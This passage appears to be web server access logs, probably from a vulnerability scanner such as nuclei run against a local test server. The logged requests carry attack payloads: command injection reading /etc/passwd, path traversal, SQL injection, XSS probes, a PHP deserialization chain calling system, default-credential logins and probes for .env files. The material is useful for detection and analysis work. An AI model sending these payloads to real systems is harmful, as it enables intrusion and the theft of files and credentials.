(Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ansible.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_shell_cmd.gch HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/login.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cache/backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"asusrouter--", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"success=%2Fshare%2Fpage%2F&failure=:\x5C\x5Cexample.com&username=baduser&password=badpass\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /share/page/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/user.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 